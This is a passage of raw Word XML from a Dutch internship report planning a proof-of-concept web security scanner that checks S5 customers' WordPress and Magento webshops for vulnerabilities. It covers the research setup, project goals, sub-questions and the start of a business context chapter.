        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="19ACE1A3" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02A5474C" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="283FE9CF" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1858F872" w14:textId="791A81A4" w:rsidR="006822D8" w:rsidRDefault="008272A8" w:rsidP="00624219">
            <w:r>
              <w:t>Webapplicatie</w:t>
            </w:r>
            <w:r w:rsidR="006822D8">
              <w:t xml:space="preserve"> Framework &amp; Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36F96D1C" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8"/>
    <w:p w14:paraId="19DBACE2" w14:textId="7C21D552" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc491022048"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="006D01D5">
        <w:t>Onderzoek opzet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="1B84082F" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D01D5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Doelgroep onderzoek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333AC1C0" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>Ik zal de doelgroep van S5 in detail onderzoeken om te achterhalen wat voor problemen zij hebben en welke oplossingen ik het best kan toepassen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027B1F2" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D01D5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kwetsbaarheden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE290E4" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>Ik zal onderzoeken wat de meest voorkomende kwetsbaarheden zijn van een website en welke het best passen bij de doelgroep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DD5DF6" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D01D5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rapporten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A65C2" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>Dit onderzoek dient om meer context te geven aan het probleem voor de lezer en voor mij. Zodat we weten wat de huidige situatie is van web security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE9095" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D01D5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D5415" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>Ik zal onderzoek doen naar bestaande web security scanner om te achterhalen hoe deze in werking gaan en hoe zij omgaan met de data dat zij verzamelen. Dit dient mij te ondersteunen in het ontwikkelen van de applicatie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DF8D0E" w14:textId="6ED27B4E" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Webapplicatie</w:t>
      </w:r>
      <w:r w:rsidRPr="006D01D5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework &amp; Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283353B7" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="000049DC" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000049DC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Disclosure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33985E6B" w14:textId="1662FC50" w:rsidR="003724D2" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">Ik heb tijdens het solliciteren ook specifiek gezocht naar stages die </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>PHP opdrachten</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aanbieden. S5 bestaat uit twee afdelingen PHP en C#, ik zit aan de PHP kan, wat betekent dat mijn directe collega’s die mij ondersteunen in het ontwikkelen van het softwareapplicatie gespecialiseerd zijn in de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>PHP programmeertaal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Om deze twee redenen is het vrij logisch dat ik voor een PHP Framework heb gekozen. Dit is voor het review van code en het oplossen van bug ideaal. PHP biedt heel wat Web Application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aan waaronder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Slim, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Symfony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Zend, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Phalcon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Yii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Maar welke is het best geschikt voor het project?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A722178" w14:textId="46BBCBF3" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">In dit onderzoek zal ik de tools die voor ons beschikbaar zijn gesteld binnen de scope onderzoeken. Dit onderzoek is gericht op het maken van de juiste keuze wat betreft de </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>Webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Framework en Database tool die ik ga gebruiken voor het ontwikkelen van de applicatie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C19DC2" w14:textId="77777777" w:rsidR="004267DD" w:rsidRDefault="00150BE4" w:rsidP="006822D8">
      <w:r>
        <w:t>Code voorbeelden die in dit documenten behandeld worden, zijn in de taal PHP geschreven.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E01DE6" w14:textId="17D34288" w:rsidR="00332CBA" w:rsidRPr="000C4AB1" w:rsidRDefault="00947024" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4AB1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bijlage A en B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF8662" w14:textId="7C01F71A" w:rsidR="00947024" w:rsidRDefault="00840439" w:rsidP="006822D8">
      <w:r>
        <w:t>In Bijlage A vindt u theorie gerelateerde onderwerpen en in Bijlage B uitvergrote systeem diagrammen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377AFA4C" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8"/>
    <w:p w14:paraId="028EF20A" w14:textId="77777777" w:rsidR="00354798" w:rsidRDefault="00354798">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0F933" w14:textId="75D5516B" w:rsidR="006822D8" w:rsidRPr="00D82484" w:rsidRDefault="006822D8" w:rsidP="00BA2E92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc491022049"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D82484">
        <w:t>Project context</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="68C4C6DB" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="002203B6" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002203B6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Doelstelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2576EC" w14:textId="2F5D13B5" w:rsidR="00F6370B" w:rsidRPr="00354798" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:r>
        <w:t xml:space="preserve">Het doel is om een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Of Concept te ontwikkelen voor een gratis Web Security Scanner die bestaande klanten van S5 kunnen gebruiken om hun webshop op kwetsbaarheden te kunnen laten scannen. Na de scan zal er een rapport gemaakt worden met de geïdentificeerde kwetsbaarheden en advies voor het opl</w:t>
      </w:r>
      <w:r w:rsidR="003E43DD">
        <w:t>ossen van de securityproblemen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E454A1" w14:textId="6EB627E5" w:rsidR="006822D8" w:rsidRPr="00723BE8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5532"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B021B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Opdracht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="178F53FF" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">De opdracht is het onderzoeken en ontwikkelen van een systeem dat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> website scant op kwetsbaarheden. De opdracht zal bestaan uit drie sub opdrachten: onderzoeken van het probleem, het ontwikkelen van een concept en het ontwikkelen van een prototype.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70961741" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="003D4C7D" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r w:rsidRPr="003D4C7D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hoofdvraag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49070C9A" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>Met welke middelen kan ik een MVP van een geautomatiseerde Web Security Scanner systeem ontwikkelen waar de klanten van S5 gratis gebruik van kunnen maken?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B50AE" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="00F33B60" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F33B60">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Deelvragen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B894103" w14:textId="4A53CE66" w:rsidR="0047039D" w:rsidRPr="0047039D" w:rsidRDefault="0055327A" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Voor wie is de </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="0047039D">
        <w:t xml:space="preserve"> bedoelt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2E9CB" w14:textId="0D11697B" w:rsidR="006822D8" w:rsidRPr="0055327A" w:rsidRDefault="0055327A" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0055327A">
        <w:t xml:space="preserve">Wat is een </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="0055327A">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52872D" w14:textId="0959992A" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wat zijn de tools en technieken die ik kan gebruiken bij het ontwikkelen van een</w:t>
      </w:r>
      <w:r w:rsidR="00DC7258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518D0BF" w14:textId="671CE473" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hoe ziet </w:t>
      </w:r>
      <w:r w:rsidR="00F65A7A">
        <w:t>het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r w:rsidR="00B602A8">
        <w:t xml:space="preserve">oncept eruit van de </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CEB8E" w14:textId="55693F15" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wat is het </w:t>
      </w:r>
      <w:r w:rsidR="00F65A7A">
        <w:t>ontwikkelproces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> voor het</w:t>
      </w:r>
      <w:r w:rsidR="00DC7258">
        <w:t xml:space="preserve"> realiseren van de </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6DCAF" w14:textId="77777777" w:rsidR="00A4332F" w:rsidRPr="0067237A" w:rsidRDefault="00A4332F" w:rsidP="00A4332F"/>
    <w:p w14:paraId="7CC1F662" w14:textId="16D6F779" w:rsidR="00A4332F" w:rsidRDefault="00A4332F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74246C3C" w14:textId="76F5C789" w:rsidR="000379AF" w:rsidRPr="00D12A39" w:rsidRDefault="00D12A39" w:rsidP="00BA2E92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc491022050"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="008A182A">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12A39">
        <w:t>usiness</w:t>
      </w:r>
      <w:r w:rsidR="0009402E">
        <w:t xml:space="preserve"> Context</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="179EA5A5" w14:textId="15064E52" w:rsidR="00017EF0" w:rsidRDefault="007A4739">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DF751C5" wp14:editId="641E4253">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-43815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>107950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3543300" cy="681990"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="18" name="Text Box 18"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3543300" cy="6819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50B18D6" w14:textId="77EFB9FF" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="007A4739">
                            <w:r>
                              <w:t>Deelvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="724DE1ED" w14:textId="776F1F57" w:rsidR="00CE4BB5" w:rsidRPr="0047039D" w:rsidRDefault="00CE4BB5" w:rsidP="00DE364B">
                            <w:r>
                              <w:t>Voor wie is de Web Applicatie Scanner bedoelt?</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6EB6EF51" w14:textId="3CCFCFD5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="007A4739">
                            <w:r>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4D9305B6" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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F751C5" id="Text Box 18" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-3.45pt;margin-top:8.5pt;width:279pt;height:53.7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gB/4YCAACKBQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+bhEBJxAalIKpKCFCh&#10;4ux4bbKq1+PaTrLpr+9nbzZElAtVL7vjmW/ej/OLtjFsrXyoyZZ8eDTgTFlJVW2fS/7j8frTGWch&#10;ClsJQ1aVfKsCv5h9/HC+cVM1oiWZSnkGIzZMN67kyxjdtCiCXKpGhCNyykKoyTci4umfi8qLDaw3&#10;phgNBqfFhnzlPEkVArhXnZDPsn2tlYx3WgcVmSk5Yov56/N3kb7F7FxMn71wy1ruwhD/EEUjagun&#10;e1NXIgq28vVfpppaegqk45GkpiCta6lyDshmOHiVzcNSOJVzQXGC25cp/D+z8nZ971ldoXfolBUN&#10;evSo2si+UMvAQn02LkwBe3AAxhZ8YHt+ADOl3WrfpD8SYpCj0tt9dZM1Cebxyfj4eACRhOz0bDiZ&#10;5PIXL9rOh/hVUcMSUXKP7uWiivVNiIgE0B6SnFm6ro3JHTQ2MQKZukq8/EgjpC6NZ2uB5sc2Bw0T&#10;Byi8Ok2VR2XnJSXcJZapuDUqGTT2u9IoVc7vDQ9CSmVj7yWjE0ojnvco7vBJtYvqPcp7jeyZbNwr&#10;N7Uln6uZd+ulMNXPPmTd4VHng7wTGdtFm2dk1Pd9QdUW4+CpW6jg5HWNnt2IEO+FxwahzbgK8Q4f&#10;bWhTctpRnC3J/36Ln/AYbEg522AjSx5+rYRXnJlvFiM/GY7HaYXzY3zyeYSHP5QsDiV21VwS+j7E&#10;/XEykwkfTU9qT80Tjsc8eYVIWAnfGJSevIzdncDxkWo+zyAsrRPxxj44mUynKqeJfGyfhHe7sY0Y&#10;+Fvqd1dMX01vh02aluarSLrOo53q3FV1V38sfJ743XFKF+XwnVEvJ3T2BwAA//8DAFBLAwQUAAYA&#10;CAAAACEADp5fLOAAAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwW7CMBBE75X6D9ZW6g2cIAgl&#10;jYNaEFKF6AGoEEcTb5Oo8TqKDYS/73Jqjzszmn2TzXvbiAt2vnakIB5GIJAKZ2oqFXztV4MXED5o&#10;MrpxhApu6GGePz5kOjXuSlu87EIpuIR8qhVUIbSplL6o0Go/dC0Se9+uszrw2ZXSdPrK5baRoyhK&#10;pNU18YdKt7iosPjZna2Cj/1tvZ0uPhO7fl8eNwfpD6vlRqnnp/7tFUTAPvyF4Y7P6JAz08mdyXjR&#10;KBgkM06yPuVJ7E8mcQzixMJoPAaZZ/L/gvwXAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA&#10;4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEA&#10;I7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA&#10;iigB/4YCAACKBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEADp5fLOAAAAAJAQAADwAAAAAAAAAAAAAAAADeBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="650B18D6" w14:textId="77EFB9FF" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="007A4739">
                      <w:r>
                        <w:t>Deelvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="724DE1ED" w14:textId="776F1F57" w:rsidR="00CE4BB5" w:rsidRPr="0047039D" w:rsidRDefault="00CE4BB5" w:rsidP="00DE364B">
                      <w:r>
                        <w:t>Voor wie is de Web Applicatie Scanner bedoelt?</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6EB6EF51" w14:textId="3CCFCFD5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="007A4739">
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4D9305B6" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="007A4739"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4578F1" w14:textId="77777777" w:rsidR="00017EF0" w:rsidRDefault="00017EF0"/>
    <w:p w14:paraId="1B039379" w14:textId="77777777" w:rsidR="00017EF0" w:rsidRDefault="00017EF0"/>
    <w:p w14:paraId="0A213EB5" w14:textId="6D86A5DC" w:rsidR="00C07CD3" w:rsidRDefault="00C07CD3" w:rsidP="003462BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6195D62A" w14:textId="0568A34B" w:rsidR="00376604" w:rsidRPr="00E85D96" w:rsidRDefault="00ED7ECD" w:rsidP="00376604">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85D96">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inleiding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4429E33B" w14:textId="3FB94160" w:rsidR="00376604" w:rsidRDefault="00C70C5A" w:rsidP="00376604">
      <w:r>
        <w:t xml:space="preserve">In dit deel zal ik behandelen wat het business context is van het project. </w:t>
      </w:r>
      <w:r w:rsidR="00457EEE">
        <w:t xml:space="preserve">Er zal onderzoek gedaan worden naar de business doelen van het project, wie de stakeholders zijn en wat de doelgroep is. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2402"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F632C9" w14:paraId="4831F383" w14:textId="77777777" w:rsidTr="00F632C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642DB2D1" w14:textId="22488D51" w:rsidR="00C43F3F" w:rsidRDefault="00C43F3F" w:rsidP="00376604">
            <w:r>
              <w:t>Business doelen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F632C9" w14:paraId="24354E5C" w14:textId="77777777" w:rsidTr="00F632C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F57BE88" w14:textId="546225B4" w:rsidR="00C43F3F" w:rsidRDefault="00C43F3F" w:rsidP="00376604">
            <w:r>
              <w:t>Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F632C9" w14:paraId="5FF3AD34" w14:textId="77777777" w:rsidTr="00F632C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C0BE8EE" w14:textId="544D5CF4" w:rsidR="00C43F3F" w:rsidRDefault="00C43F3F" w:rsidP="00376604">
            <w:r>
              <w:t>Doelgroep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
